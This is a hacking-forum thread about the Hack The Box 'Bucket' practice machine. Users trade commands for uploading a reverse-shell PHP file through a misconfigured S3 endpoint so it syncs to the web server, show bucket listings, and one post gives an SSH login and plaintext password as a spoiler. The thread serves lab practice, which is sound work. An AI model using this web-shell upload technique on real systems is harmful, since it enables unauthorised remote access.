TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#25
You need to wait the sync part. This can take some time.
Reply
#26
(October 18, 2020 at 03:45 PM)xxxyz Wrote: You need to wait the sync part. This can take some time.

i can't run the sync manually ?
Reply
#27
No there is a cron-task for that. Try to change the name of your file. It was instant when I uploaded index.php.
Reply
#28
`[email protected]:~/Desktop/HacktheBox/Bucket# aws --endpoint-url=http://s3.bucket.htb s3 cp ./reverse-shell.php s3://kali76
upload: ./reverse-shell.php to s3://kali76/reverse-shell.php`

but dosn't work  on the URL http://bucket/reverse-shell.php

Why?
Reply
#29
(October 18, 2020 at 04:25 PM)Kali76 Wrote: `
[email protected]:~/Desktop/HacktheBox/Bucket# aws --endpoint-url=http://s3.bucket.htb s3 cp ./reverse-shell.php s3://kali76

upload: ./reverse-shell.php to s3://kali76/reverse-shell.php
`
but dosn't work  on the URL http://bucket/reverse-shell.php

Why?

You need to upload on s3://adserver
Reply
#30
(October 18, 2020 at 04:27 PM)xxxyz Wrote:
(October 18, 2020 at 04:25 PM)Kali76 Wrote: `
[email protected]:~/Desktop/HacktheBox/Bucket# aws --endpoint-url=http://s3.bucket.htb s3 cp ./reverse-shell.php s3://kali76

upload: ./reverse-shell.php to s3://kali76/reverse-shell.php
`
but dosn't work  on the URL http://bucket/reverse-shell.php

Why?

You need to upload on s3://adserver

done, but dosn't work the same

(October 18, 2020 at 04:27 PM)xxxyz Wrote:
(October 18, 2020 at 04:25 PM)Kali76 Wrote: `
[email protected]:~/Desktop/HacktheBox/Bucket# aws --endpoint-url=http://s3.bucket.htb s3 cp ./reverse-shell.php s3://kali76

upload: ./reverse-shell.php to s3://kali76/reverse-shell.php
`
but dosn't work  on the URL http://bucket/reverse-shell.php

Why?

You need to upload on s3://adserver

[email protected]:~/Desktop/HacktheBox/Bucket# aws --endpoint-url=http://s3.bucket.htb s3 cp ./reverse-shell.php s3://adserver
upload: ./reverse-shell.php to s3://adserver/reverse-shell.php
[email protected]:~/Desktop/HacktheBox/Bucket# aws --endpoint-url=http://s3.bucket.htb s3api list-buckets | jq .
{
  "Buckets": [
    {
      "Name": "test",
      "CreationDate": "2020-10-18T14:26:44.012003Z"
    },
    {
      "Name": "kali76",
      "CreationDate": "2020-10-18T15:11:23.983027Z"
    },
    {
      "Name": "adserver",
      "CreationDate": "2020-10-18T15:31:03.435861Z"
    }
  ],
  "Owner": {
    "DisplayName": "webfile",
    "ID": "bcaf1ffd86f41161ca5fb16fd081034f"
  }
}

http://bucket.htb/reverse-shell.php
Reply
#31
When you upload your file in the bucket adserver you need to wait the sync part. When the file in the bucket is out then you can check on the real server bucket.htb/....php

There is a sync feature you just need to wait and check.
Reply
#32
(October 18, 2020 at 04:35 PM)xxxyz Wrote: When you upload your file in the bucket adserver you need to wait the sync part. When the file in the bucket is out then you can check on the real server bucket.htb/....php

There is a sync feature you just need to wait and check.

I've been waiting for at least 10 minutes but nothing, it doesn't find any of the files I upload
Reply
#33
Well try to use a different name for your file. On vip server it take like 30s max.
Reply
#34
(October 18, 2020 at 11:08 AM)ARhOmOuTEd Wrote: you can upload files to the buckets

└─# aws --endpoint-url=http://s3.bucket.htb s3 cp ./myfile.txt s3://macz             
                                                       
you can reach the file over the url           
http://s3.bucket.htb/macz/myfile.txt
cool this is awsome thanks for your help guys
Reply
#35
any hint for the privesc root?
Reply
#36
ssh [email protected]
n2vM-<_K_Q:.Aa2
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Cereal.htb discussion (no tutorial) Kali76 18 1,934 5 hours ago
Last Post: blurghadurgh
TUTORIAL Phonebook Discussion internet dreams 13 1,561 November 14, 2020 at 09:25 PM
Last Post: Masterofntn
FLAG free user flag for bucket htb lamehacker 11 1,801 November 14, 2020 at 03:25 AM
Last Post: lamehacker

 Users browsing this thread: 2 Guest(s)